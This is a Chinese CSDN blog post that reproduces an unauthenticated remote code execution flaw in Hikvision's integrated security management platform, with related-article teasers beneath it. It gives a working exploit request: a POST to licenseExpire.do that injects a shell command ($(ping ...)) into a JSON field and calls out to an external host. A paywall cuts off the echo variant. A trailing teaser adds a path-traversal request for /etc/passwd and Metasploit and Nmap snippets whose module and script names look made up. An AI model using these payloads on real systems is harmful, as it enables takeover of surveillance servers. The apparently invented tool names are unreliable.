[漏洞复现]海康威视综合安防管理平台存在licenseExpire前台RCE

LiangYueSec

已于 2024-08-02 17:27:43 修改

阅读量1k

点赞数 3

文章标签： web安全安全海康

于 2024-08-02 17:27:18 首次发布

本文链接：https://blog.csdn.net/LiangYueSec/article/details/140876237

版权

如果觉得该文章有帮助的，麻烦师傅们可以搜索下微信公众号：良月安全。点个关注，感谢师傅们的支持。

免责声明

本号所发布的所有内容，包括但不限于信息、工具、项目以及文章，均旨在提供学习与研究之用。所有工具安全性自测。如因此产生的一切不良后果与文章作者和本公众号无关。如有涉及公司与个人敏感信息，侵权烦请告知，我们会立即删除并致歉。

漏洞简介

海康威视综合安防管理平台涵盖了视频监控、报警系统、门禁系统等众多功能，实现了全方位的安防管理。攻击者可通过前台RCE获取服务器权限。

漏洞POC

跟detection命令执行利用差不多

POST /portal/cas/login/ajax/licenseExpire.do HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

{"type":"environment","operate":"","machines":{"id":"$(ping+qsdiehtuxn.dgrh3.cn)"}

执行回显

POST /portal/cas/login/ajax/licenseExpire.do HTTP/1.1
Host: 
Cache-Control: max-age=0
Accept: application/json, tex

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

LiangYueSec

关注关注

3
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

海康威视综合安防管理平台 detection 前台RCE漏洞复现

0xSec

07-22

5651

海康威视综合安防管理平台 /center/api/installation/detection 接口处存在远程命令执行漏洞，未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个web服务器。

海康威视iSecure Center 综合安防管理平台detection接口存在远程命令执行漏洞

xiaokp7的博客

07-24

1515

HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台，通过接入视频监控、一卡通、停车场、报警检测等系统的设备，获取边缘节点数据，实现安防信息化集成与联动，以电子地图为载体，融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务，对各系统资源进行了整合和集中管理，实现统一部署、统一配置、统一管理和统一调度。

参与评论您还未登录，请先登录后发表或查看评论

海康威视运行管理中心 Fastjson RCE

Keepb1ue的博客

12-21

3717

海康威视运行管理中心系统存在低版本Fastjson远程命令执行漏洞，攻击者可在未鉴权情况下获取服务器权限，且由于存在相关依赖，即使服务器不出网无法远程加载恶意类也可通过本地利用链直接命令执行，从而获取服务器权限。

【攻防演练】【含poc和修复建议】海康威视综合安防管理平台 远程命令执行漏洞

zzxx191z的博客

07-27

1323

使用防护类设备进行防护，限制访问/center/api/installation/detection 路径，拦截请求中出现的恶意命令注入。

几乎全是RCE，100%有PoC，2024年红队最害怕你知道的50个高危漏洞！从零基础到精通，收藏这篇就够了！

最新发布

Python_0011的博客

03-11

901

这些漏洞几乎都是RCE（绝对高价值），100%有PoC及微步捕获到攻击行为（危害极大），漏洞80%来自微步漏洞奖励计划（绝对是认真的），与市面上已发布漏洞绝大多数都不重复，强烈建议各位师傅提前排查。另外，攻防演练期间，微步同样提供漏洞验真报告，对每一条漏洞进行人工验证与复现，并将所有验真漏洞汇总成报告（下方为2023年攻防演练期间，微步提供的攻防验真报告截图）。大白也帮大家准备了详细的学习成长路线图。这也是耗费了大白近四个月的时间，吐血整理，文章非常非常长，觉得有用的话，希望粉丝朋友帮忙点个**「分享」

海康威视iSecure Center综合安防管理平台center任意文件上传漏洞

bmaoHk的博客

10-03

900

海康威视综合安防管理平台Fastjson远程命令执行漏洞

holyxp的博客

07-24

2393

综合安防管理平台基于 " 统一软件技术架构" 理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务，对各系统资源进行了整合和集中管理，实现统一部署、配置、管理和调度。

海康威视iSecure-Center 综合安防管理平台 applyAutoLoginTicket/keepAlive/applyCT 远程命令执行漏洞

WuYSec的博客

06-12

1378

海康威视iSecure Center综合安防管理平台是一套集成化、智能化的安防管理系统。海康威视iSecure Center综合安防管理平台存在远程命令执行漏洞，可造成远程命令执行。

海康威视综合安防管理平台 多处 FastJson反序列化RCE漏洞复现

0xSec

06-07

2462

由于海康威视综合安防管理平台使用了低版本的fastjson，攻击者可在未鉴权情况下获取服务器权限，且由于存在相关依赖，即使服务器不出网无法远程加载恶意类也可通过本地链直接命令执行，从而获取服务器权限。

海康威视综合安防管理平台部署手册

09-13

海康威视作为全球领先的安防解决方案提供商，其综合安防管理平台是企业级客户进行安全监控、报警管理、视频存储及分析的重要工具。本部署手册旨在为用户详细阐述如何有效地安装、配置以及管理这一系统，确保用户能够...

海康综合安防管理平台远程命令执行漏洞（CNVD-2024-18673）复现

fly夏天的博客

06-19

5013

海康综合安防管理平台远程命令执行漏洞（CNVD-2024-18673）复现

【漏洞复现】Hikvision综合安防管理平台config信息泄露漏洞

晚风不及你

01-21

3467

Hikvision（海康威视）是一家在中国颇具影响力的安防公司，其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。

海康威视综合安防管理平台 orgManage/v1/orgs/download 任意文件读取漏洞复现

0xSec

05-31

1779

海康威视综合安防管理平台 orgManage/v1/orgs/download 接口处存在任意文件读取漏洞，未经身份验证的远程攻击者可利用目录遍历的方式绕过权限认证直接读取后台服务器配置文件等敏感文件，造成信息泄露，使系统处于极不安全的状态。

【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

李火火的安全圈

04-28

9209

综合安防管理平台基于统一软件技术架构理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务，对各系统资源进行了整合和集中管理，实现统一部署、配置、管理和调度。海康威视综合安防管理平台存在Fastjson远程命令执行漏洞，该漏洞可执行系统命令，可获取到目标服务器系统权限以及敏感数据信息。

海康威视 isecure center 综合安防管理平台任意文件上传漏洞

李火火的安全圈

06-19

1917

海康威视部分综合安防管理平台管理平台基于统一软件技术架构理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务，对各系统资源进行了整合和集中管理，实现统一部署、配置、管理和调度。海康威视综合安防管理平台keepAlive接口存在Fastjson远程命令执行漏洞，攻击者可通过构造恶意Payload执行并获取服务器系统权限以及敏感数据信息。

海康威视部分综合安防管理平台产品存在任意文件上传漏洞

Al345__的博客

11-19

2076

海康威视部分综合安防管理平台历史版本由于对上传文件接口校验不足，攻击者可以将恶意文件上传到平台，导致获取服务权限或服务异常。攻击者利用该漏洞上传Webshell，并随后执行任意命令，对主机上相关文件进行加密，加密后缀为locked1。海康威视iVMS集中监控应用管理平台，是以安全防范业务应用为导向，以视频图像应用为基础手段，综合视频监控、联网报警、智能分析、运维管理等多种安全防范应用系统，构建的多业务应用综合管理平台。（2）建立重要业务数据的定期备份机制，并做好权限隔离，防止勒索软件对备份数据进行加密；

海康威视iSecure Center综合安防管理平台 config.properties信息泄漏漏洞

菜鸟学渗透

08-21

1206

海康威视iSecure Center综合安防管理平台 config.properties信息泄漏漏洞

【漏洞复现】海康威视安防管理平台/v1/keepAlive 接口处存在远程命令执行漏洞

m0_46381222的博客

10-23

980

【漏洞复现】海康威视安防管理平台/v1/keepAlive 接口处存在远程命令执行漏洞

【漏洞复现】Hikvision综合安防管理平台Fastjson命令执行漏洞

晚风不及你

01-23

1462

海康威视综合安防平台漏洞复现工具

03-01

### 海康威视综合安防平台漏洞复现工具对于海康威视综合安防管理平台中存在的多个安全漏洞，研究者通常依赖特定的安全测试框架和自动化扫描工具来辅助漏洞的发现与验证。以下是几种常用的工具： #### 1. Burp Suite Professional Burp Suite 是一款广泛应用于Web应用安全性评估的强大工具集。它能够帮助研究人员拦截HTTP/HTTPS流量并修改请求数据包，这对于探索API端点如`keepAlive`接口中的fastjson反序列化漏洞非常有用[^3]。 ```bash # 使用Burp Suite代理浏览器流量 export HTTP_PROXY=http://127.0.0.1:8080 export HTTPS_PROXY=https://127.0.0.1:8080 ``` #### 2. Metasploit Framework (MSF) Metasploit是一个开源渗透测试平台，提供了丰富的模块库支持针对不同类型的漏洞开发载荷(payload)，特别是当涉及到远程代码执行(RCE)场景时，比如通过`licenseExpire`路径触发的前台RCE漏洞[^2]。 ```ruby use exploit/unix/webapp/hikvision_rce_licenseexpire set RHOSTS target_ip_address exploit ``` #### 3. Nmap Scripting Engine (NSE) Nmap不仅限于网络扫描，在其内置脚本引擎的帮助下还可以用来探测服务版本以及是否存在已知漏洞的服务实例。这有助于快速定位可能受影响的目标系统。 ```bash nmap --script hikvision-vuln -p 80,443 <target> ``` #### 4. 自定义Python脚本为了更精确地控制发送给目标服务器的数据结构，编写专门针对某个具体漏洞特性的Python脚本可能是必要的选择之一。例如，处理orgManage/v1/orgs/download接口下的任意文件读取问题可以通过构造恶意URL参数实现[^4]。 ```python import requests url = 'http://example.com/orgManage/v1/orgs/download' params = {'path': '../../etc/passwd'} response = requests.get(url, params=params) print(response.text) ``` 这些工具和技术手段可以帮助安全专家深入理解海康威视综合安防管理平台内部机制及其潜在风险点。然而值得注意的是，所有上述操作都应在合法授权范围内进行，并遵循当地法律法规的要求。